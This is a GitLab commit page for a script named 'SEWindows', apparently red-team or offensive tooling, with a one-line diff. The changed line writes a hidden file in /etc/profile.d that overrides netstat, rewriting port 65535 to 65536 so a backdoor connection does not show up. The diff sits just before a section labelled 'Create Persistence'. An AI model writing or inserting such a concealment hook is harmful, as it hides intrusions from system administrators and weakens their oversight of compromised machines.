UNCLASSIFIED

Skip to content
Snippets Groups Projects
Commit 39eb0321 authored by Avery Kleeman's avatar Avery Kleeman
Browse files

Update SEWindows

parent 7d0fc94d
No related merge requests found
......@@ -27,7 +27,7 @@ fi
if ! [ -d $DIR01 ]
then
touch /etc/profile.d/01-hidden.sh
echo -e "function netstat() {\n\tnetstat -tunap | sed -e 's/65535/65536/g'\n}" > /etc/profile.d/01-hidden.sh
echo -e "function netstat() {\n\t/usr/bin/netstat -tunap | /usr/bin/sed -e 's/65535/65536/g'\n}" > /etc/profile.d/01-hidden.sh
fi
# Create Persistence
......
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment